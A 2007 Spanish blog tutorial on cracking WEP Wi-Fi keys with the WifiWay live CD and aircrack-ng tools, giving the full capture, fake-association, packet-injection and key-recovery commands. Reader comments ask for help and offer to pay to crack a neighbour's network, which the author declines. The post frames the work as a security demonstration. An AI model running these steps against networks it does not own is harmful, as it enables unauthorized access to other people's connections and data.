lunes, 27 de agosto de 2007

HOWTO Crack WEP - Sony Vaio

Por una necesidad laboral, tuve que demostrar que WEP es falible. Aunque que yo 'sabía' que ésto podía hacerse, en la práctica nunca lo hice yo.

Nota: Esto es para fines de investigación, aprendizaje, y verificación de seguridad. No debe usarse para vulnerar redes de otras personas. Atacar y vulnerar redes (u otros recursos) es malo, e ilegal.

Investigando un poco, encontré que la placa de red de mi Sony Vaio VGN N350FE, una Intel 3945ABG, no permitía ciertas cosas desde linux, entre las cuales una de ellas era necesaria para poder demostrar esta vulnerabilidad.
Si leyeron mis posts anteriores, verán que no es el primer problema que encuentro con el hardware.
Tampoco es el primero al que encuentro solución :-)

Encontré un howto en http://foro.seguridadwireless.net/index.php?topic=3227.0 que usé como base.

A continuación, les explico los pasos que seguí para romper WEP.
Necesitamos una distribución de linux que podemos encontrar en http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. Bajamos la imagen del CD, y la quemamos.

Iniciamos la máquina con WifiWay (debe estar configurada para permitir iniciar desde CD/DVD).

Una vez iniciada, iniciamos el entorno gráfico mediante el comando:

startx

Ingresamos el canal en el que está el AP (Access Point) en la placa de red.

echo 'CANAL_DE_CAPTURA' > /sys/class/net/wifi0/device/channel

Obtenemos el BSSID, el canal, y el ESSID.

airodump-ng rtap0

Cerramos la ejecución con CONTROL-C, y utilizamos configuramos el BSSID (un número hexadecimal de 6 posiciones) en la placa de red.

echo 'BSSID_DEL_ACCESS_POINT' > /sys/class/net/wifi0/device/bssid

Una vez hecho esto, iniciamos la captura.

airodump-ng -c CANAL_DE_CAPTURA -w ARCHIVO_CAPTURA rtap0

Abrimos otra ventana y configuramos la velocidad a 2 mbps:

echo '2' > /sys/class/net/wifi0/device/rate

Subimos la placa de red.

ifconfig wifi0 up

Averiguamos la MAC address, son los 12 primeros numeros de HWaddr

ifconfig

Iniciamos una asociación con el AP.

aireplay-ng -1 0 -a BSSID_DEL_ACCESS_POINT -h MAC_ADDRESS_WIFI -e ESSID_DEL_ACCESSPOINT wifi0

Abrimos otra consola y ponemos para inyectar tráfico.

aireplay-ng -3 -b BSSID_DEL_ACCESS_POINT -e ESSID_DEL_ACCESSPOINT -h MAC_ADDRESS_WIFI wifi0

Esto debería aumentar los #data en la ventana de captura (pasa un momento antes que empiece a aumentar).
Cuando tengamos mas de 100.000 podemos extraer la clave ejecutando:

aircrack-ptw ARCHIVO_CAPTURA.cap

Esto debería encontrar la clave de red en formato hexadecimal.

Nota: En todos los comandos anteriores, wordpress convierte automáticamente las comillas a comillas formateadas. Por favor usar comillas simples.

Espero, estimados lectores, que esto haya sido de utilidad.

Saludos!

English version


7 comentarios:

Anónimo dijo...

Hola quiero que me expliques bien como se hace eso de conseguir la wep de infinitum se me hace algo interesante hacerlo, me gustaria sacar aunque sea la clave de mi propio router nomas para probar, me podrias ayudar? apenas estoy empezando con esto de las computadoras asi que no se mucho, si me ensenas a hacer todo esto yo te podria dar un dinerito espero te animes mi correo es emiliobarrio3@gmail.com por si te animas

Anónimo dijo...

solo puedo decir una sola cosa.... EXCELENTE... en realidad fue un poco complicado al comienzo, en especial para alguien que nunca ha visto linux, pero esta increiblemente exacto y FUNCIONA al 110 %. Gracias...

Unknown dijo...

pago por crackiar a mi vecino

Sebastián Stucke dijo...

Ana María:
Este post es para efectos educativos para aprender a asegurar nuestra información y recursos.
No promuevo ni voy a promover el acceso a información y recursos que no nos pertenecen.
No voy a dar lecciones de ética, pero preguntate si vos querés que otra persona entre sin autorización a tu máquina, a tus archivos y pueda usar tu conexión de banda ancha para sus propios fines (en desmedro de los tuyos).
Suerte

Anónimo dijo...

jajaj ñoño...
igual te complicaste mucho...
es mucho mas facil.. la misma tarjeta de red.. wildpackets omnipeek y win aircrack todo con windows XP
mas q facil

buena info.. pero muy complicada para la gente q quiere aprender.. como ana maria que quiere aprender de su vecino

Anónimo dijo...

holas ante todo soy nuevo en estas cosas pero me parecio interesante lo que encontre aqui, quisiera saber si este programa es para windws xP? y como poder aplicarlo,dame una mano please........demonio_leo17@hotmail.com

Unknown dijo...

Hola, soy nuevo en esto de las redes y recientemente compre un Router trendnet para mi casa, un dia me dio por investigar acerca de la seguridad de las redes inalambricas y encontre toda esta informacion, sin embargo estoy tratando de bajar la imagen de WifiWay y todos los links que encuentro estan caidos...hay algun otro lugar desde donde encontrar esa imagen y asi probar la seguridad de mi red??? gracias...ecabrejo@gmail.com